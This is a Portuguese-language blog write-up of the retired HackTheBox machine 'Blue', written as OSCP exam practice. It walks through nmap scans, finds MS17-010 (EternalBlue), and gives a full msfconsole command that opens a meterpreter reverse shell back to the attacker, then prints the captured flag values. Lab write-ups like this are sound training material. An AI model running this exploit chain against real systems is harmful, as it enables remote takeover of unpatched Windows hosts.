OSCP Prep — TJNull HTB — 4 -Blue Write-up

Fabio Araujo Fabres
3 min readApr 27, 2021

--

Máquina bem simples, pois utiliza um dos mais famosos exploit de windows que foi eternizado no wannacry.

Lembrando que pelo relatório para a prova do OSCP inicia-se no item 3 a parte de methodologies e informações da maquina e sistemas. Iniciaremos o Write-up direto da enumeração pelo item 3.2.1

Por se tratar de uma maquina aposentada (retired) do HTB o IP muda cada vez que ela é ligada, para este artigo o IP é: 10.129.137.149

- Nmap Scan Results:

nmap -n -T5 -A — top-ports 10000 -oN 1-nmapTudao.txt 10.129.137.149

3.2.2 Identify and analysis possibles vulnerability

Após a identificação dos serviços, foram realizadas pesquisas sobre os serviço smb e rpc, para isso foi exeutado o script de vulnerabilidade do nmap:

nmap -n -T4 -p445 — script vuln 10.129.137.149

E foi constatado a vulnerabilidade a ms17–010, conhecido como eternalblue:

- Vulnerability Explanation and POC:

A vulnerabilidade do ms17–010 eternalblue permite uma exploração através do serviço de compartilhamento do windows na porta 445 permitindo RCE, então o ataque consiste em executar um payload que possibilite um reverseshell com privilégios de administrador do sistema..

3.2.3 Gain Access

- Getting Low-Privilege shell:

Para obter acesso foi utilizado um módulo do msfconsole para exploração do ms17–010

Foi escolhido a opção 0, então para executar foi utilizado o seguinte comando:

msfconsole -x ‘use windows/smb/ms17_010_eternalblue; set RHOSTS 10.129.137.149; set payload; windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4444; run;’

Acesso com authority system

Com usuário authority foi obtida a flag do usuário e do root nos seguintes endereços

‘C:\Documents and Settings\john\Desktop\user.txt

type C:\Users\haris\Desktop\user.txt

C:\DocumentsandSettings\Administrator\Desktop\root.txt

type C:\Users\Administrator\Desktop\root.txt

Proof Screenshot Here:

— user.txt Contents:

4c546aea7dbee75cbd71de245c8deea9

— root.txt Contents:

ff548eb71e920ff6c08843ce9df4e717

https://www.hackthebox.eu/profile/175927

--

--